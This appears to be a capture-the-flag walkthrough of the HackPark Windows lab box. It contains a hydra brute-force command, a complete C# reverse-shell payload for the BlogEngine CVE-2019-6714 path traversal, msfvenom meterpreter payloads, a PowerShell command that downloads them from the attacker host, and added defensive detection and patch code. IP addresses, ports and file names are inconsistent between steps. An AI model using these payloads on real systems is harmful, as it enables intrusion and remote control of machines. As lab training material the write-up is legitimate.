CHALLENGE OVERVIEW
- Link: hackpark
- Difficulty: Medium
- Goal: user and root flags on a Windows machine
- Highlight: using metasploit to quickly and easily gain root access
- Tools: nmap, dirb, hydra, burpsuite, msfvenom
- Tags: RCE (remote code execution), Windows
BACKGROUND
In this box, we'll hack into a Windows machine using standard pen-testing tools. There are two options for solving the box.
I'll demonstrate in this post how to hack into the box with metasploit. In the upcoming Hackpark Part II post, I'll show how to find the flags without using metasploit.
ATTACK MAP
IPs
First, let's record our IP addresses in export format to use as bash variables.
export myIP=10.6.2.23
export targetIP=10.10.72.99
ENUMERATION
We'll kick things off with a dirb scan and an nmap scan.
/admin is found on targetIP with dirb.
    ┌─[kalisurfer@parrot]─[~]
    └──╼ $nmap 10.10.208.243
    Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
    Nmap scan report for 10.10.208.243
    Host is up (0.098s latency).
    Not shown: 998 filtered tcp ports (no-response)
    PORT     STATE SERVICE
    80/tcp   open  http
    3389/tcp open  ms-wbt-server
The ms-wbt-server looks interesting. A quick Google search reveals that this port is used for Windows Remote Desktop. We may come back to this later on in the hack.
PREPPING OUR COMMAND FOR HYDRA
Next, we'll use Firefox in developer mode to inspect the POST request when we attempt to log in to the /admin portal with generic credentials (admin:pass). The captured request body looks like this:
    __VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
Next, we'll prepare the command for hydra to use to brute-force our way into the admin portal.
hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
- -l is for the username
- -P is for the password wordlist
- http-post-form specifies the type of request (an HTTP POST form)
- :Login failed (at the end of the command) specifies the response message after a failed login attempt
Results:
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
    [DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
    [STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
    [80][http-post-form] host: 10.10.208.243   login: admin   password: 1qaz2wsx
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43
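As an added, defender-side example (not part of the original walkthrough), here is what the same brute-force run looks like from the web server's side. It assumes IIS W3C logging with the field order given in the constructed header line below, and a threshold of 20 login POSTs per minute from one client; the log lines are constructed samples, not captured from the box.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"   # BlogEngine login form used in the writeup

# Constructed IIS W3C log: header plus 25 POSTs from one client in 50 seconds
# (hydra in the writeup managed ~663 tries/min) and one normal user's login.
def _line(sec, ip, method="POST", status="200"):
    return (f"2023-01-08 18:02:{sec:02d} 10.10.208.243 {method} {LOGIN_PATH} "
            f"ReturnURL=%2fadmin 80 - {ip} Mozilla/5.0+(Hydra) - {status} 0 0 12")

SAMPLE_LOG = ["#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
              "cs-username c-ip cs(User-Agent) cs-referer sc-status sc-substatus "
              "sc-win32-status time-taken"]
SAMPLE_LOG += [_line(s, "10.6.2.23") for s in range(0, 50, 2)]
SAMPLE_LOG += [_line(30, "10.6.2.50", "GET"), _line(31, "10.6.2.50")]

def parse_iis_line(line):
    """Return (timestamp, client_ip, method, uri_stem, status), or None for
    comment/header lines and lines with too few fields."""
    if not line or line.startswith("#"):
        return None
    f = line.split(" ")
    if len(f) < 12:
        return None
    ts = datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S")
    return ts, f[8], f[3], f[4], f[11]

def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Map client IP -> peak number of login POSTs seen inside one sliding
    window, for every IP that reached `threshold`."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        ts, ip, method, stem, _status = rec
        if method != "POST" or stem.lower() != LOGIN_PATH.lower():
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop hits older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))     # {'10.6.2.23': 25}
```

The status code is deliberately ignored: against this form a failed login still returns 200 with "Login failed" in the body, so rate is the useful signal, not status.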
INITIAL FOOTHOLD
Now we can log in with the user:password combo admin:1qaz2wsx
We're shown an admin dashboard. Searching for blogengine on exploit-db.com reveals a possible exploit for us to use: (CVE-2019-6714).
To use the exploit, we need to upload the exploit's payload (PostView.ascx) through the file manager. We can then trigger it by accessing the following address in our browser:
http://10.10.172.59/?theme=../../App_Data/files
And we should then be able to catch the revshell with a netcat listener.
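An added example, not from this post or from BlogEngine's own code, showing the check that closes this class of traversal (the theme parameter is used to build a path, so the name must be allow-listed and the resolved path must stay under the themes directory) together with a log-side detector for it. The allow-list pattern, the themes directory path and the default theme name are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for theme names; the exact policy is an assumption for this example.
THEME_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def _inside(root, candidate):
    """True if `candidate` is `root` itself or lies beneath it."""
    return os.path.commonpath([root, candidate]) == root

def resolve_theme_dir(themes_root, theme):
    """Return the absolute theme directory, or None if the name is rejected.

    Two independent checks: the allow-list on the raw name, and a containment
    check on the normalised path, so a bypass of one still fails the other."""
    if not THEME_NAME.match(theme):
        return None
    root = os.path.realpath(themes_root)
    candidate = os.path.realpath(os.path.join(root, theme))
    return candidate if _inside(root, candidate) else None

def theme_from_url(url, themes_root, default="Standard"):
    """Take ?theme= from a request URL (hypothetical request handler) and
    resolve it with the checks above. `default` is an assumed theme name."""
    theme = parse_qs(urlsplit(url).query).get("theme", [default])[0]
    return resolve_theme_dir(themes_root, theme)

def is_traversal_attempt(url):
    """Detection-side twin for web logs: parse_qs decodes %2e%2e%2f as well,
    so encoded variants of the traversal are caught too."""
    theme = parse_qs(urlsplit(url).query).get("theme", [""])[0]
    return ".." in theme or "/" in theme or "\\" in theme

if __name__ == "__main__":
    hit = "http://10.10.172.59/?theme=../../App_Data/files"   # URL from the writeup
    print(theme_from_url(hit, "/srv/blog/themes"), is_traversal_attempt(hit))
```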
PREPARE THE PAYLOAD
We need to change the IP and port (the TcpClient host and port in the payload) to our own, and then save it as PostView.ascx
payload:
    <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
    <%@ Import Namespace="BlogEngine.Core" %>
    <script runat="server">
        static System.IO.StreamWriter streamWriter;

        protected override void OnLoad(EventArgs e)
        {
            base.OnLoad(e);
            using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888))
            {
                using(System.IO.Stream stream = client.GetStream())
                {
                    using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream))
                    {
                        streamWriter = new System.IO.StreamWriter(stream);
                        StringBuilder strInput = new StringBuilder();
                        System.Diagnostics.Process p = new System.Diagnostics.Process();
                        p.StartInfo.FileName = "cmd.exe";
                        p.StartInfo.CreateNoWindow = true;
                        p.StartInfo.UseShellExecute = false;
                        p.StartInfo.RedirectStandardOutput = true;
                        p.StartInfo.RedirectStandardInput = true;
                        p.StartInfo.RedirectStandardError = true;
                        p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                        p.Start();
                        p.BeginOutputReadLine();
                        while(true)
                        {
                            strInput.Append(rdr.ReadLine());
                            p.StandardInput.WriteLine(strInput);
                            strInput.Remove(0, strInput.Length);
                        }
                    }
                }
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();
            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }
    </script>
    <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
SET UP THE NC LISTENER
Next, let's spin up a netcat listener with the command:
nc -lnvp 8888
TRIGGER THE REV SHELL
Now that our malicious payload is uploaded and our netcat listener is active, all we have to do is navigate to the following address, and we should catch the reverse shell as planned.
http://10.10.172.59/?theme=../../App_Data/files
And … bingo! We've caught the revshell and we're in with our initial foothold!
UPGRADE THE SHELL TO METERPRETER
Now that we're in the shell, we can work on upgrading it to a meterpreter shell. This will allow us to use the many powerful tools within the metasploit framework.
We'll use python3 to spin up a simple HTTP server that will serve the reverse meterpreter shell payload file to the Windows machine.
USE MSFVENOM TO CREATE REVSHELL PAYLOAD
The following command will create the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe
The payload didn't work on my machine, so I added encoding using a standard encoder, "shikata ga nai".
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe
TRANSFER THE MSFVENOM PAYLOAD TO TARGET
Next, we'll transfer the encoded payload from our attack machine to the target machine.
Let's navigate to the directory that holds payload.exe on our attack machine. Then we'll spin up a simple HTTP server using the command:
python3 -m http.server
Then we'll grab the file and copy it to our target Windows machine from the HTTP server:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"
Notice that we save the file in the Temp directory because we have write permissions there. This is a common configuration that can be leveraged as an unprivileged user.
CATCH THE METERPRETER SHELL WITH METASPLOIT
First, let's fire up the Metasploit console:
msfconsole
Then load the handler:
use exploit/multi/handler
Next, we need to set the lport and lhost, and set the payload to windows/meterpreter/reverse_tcp
Now that everything is set up correctly, we can run it to boot up the meterpreter listener:
run
Then run shell.exe on the target machine to throw a meterpreter revshell.
And we got it! The lower left console window shows the meterpreter shell.
Now that we're running a meterpreter shell in msfconsole, we can quickly pwn the system with:
getsystem
And view the system information:
sysinfo
We can view our user information with the command:
getuid
Since we're already NT Authority, thanks to the magical powers of Metasploit, we don't have to do anything else except locate and retrieve the two flags.
We found both flags!
In the next post, I'll walk you through an alternate solution to this box without needing Metasploit.